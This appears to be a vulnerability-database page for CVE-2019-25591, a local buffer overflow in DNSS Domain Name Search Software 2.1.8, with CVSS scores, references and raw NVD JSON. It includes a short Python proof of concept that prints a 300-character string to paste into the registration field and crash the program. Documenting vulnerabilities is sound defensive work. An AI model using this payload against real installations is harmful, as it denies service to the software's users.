CVE-2019-25591

Description

DNSS Domain Name Search Software 2.1.8 contains a buffer overflow vulnerability in the registration code input field that allows local attackers to crash the application by submitting an excessively long string. Attackers can trigger a denial of service by pasting a malicious registration code containing 300 repeated characters into the Name/Key field via the Register menu option.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

DNSS Domain Name Search Software 2.1.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2019-25591
# Description: Buffer Overflow in DNSS Domain Name Search Software 2.1.8
# Usage: Copy the generated string and paste it into the Name/Key field in the Register menu.

def generate_overflow_payload():
    # The vulnerability is triggered by a string of approximately 300 characters
    # This size exceeds the allocated buffer for the registration key input.
    junk_buffer = 'A' * 300
    return junk_buffer

if __name__ == "__main__":
    payload = generate_overflow_payload()
    print("[+] Malicious payload generated:")
    print(payload)
    print(f"\n[+] Payload length: {len(payload)} characters")
    print("[+] Paste the payload into the vulnerable input field to trigger the crash.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25591
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25591
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25591/
[4] VulDB https://vuldb.com/cve/CVE-2019-25591
[5] http://www.nsauditor.com/downloads/dnss_setup.exe
[6] https://www.exploit-db.com/exploits/46831
[7] https://www.vulncheck.com/advisories/dnss-domain-name-search-software-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25591", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:25.633", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNSS Domain Name Search Software 2.1.8 contains a buffer overflow vulnerability in the registration code input field that allows local attackers to crash the application by submitting an excessively long string. Attackers can trigger a denial of service by pasting a malicious registration code containing 300 repeated characters into the Name/Key field via the Register menu option."}, {"lang": "es", "value": "DNSS Domain Name Search Software 2.1.8 contiene una vulnerabilidad de desbordamiento de búfer en el campo de entrada del código de registro que permite a atacantes locales bloquear la aplicación al enviar una cadena excesivamente larga. Los atacantes pueden desencadenar una denegación de servicio al pegar un código de registro malicioso que contiene 300 caracteres repetidos en el campo Nombre/Clave a través de la opción de menú Registrar."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://www.nsauditor.com/downloads/dnss_setup.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46831", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/dnss-domain-name-search-software-denial-of-service", "source": "[email protected]"}]}}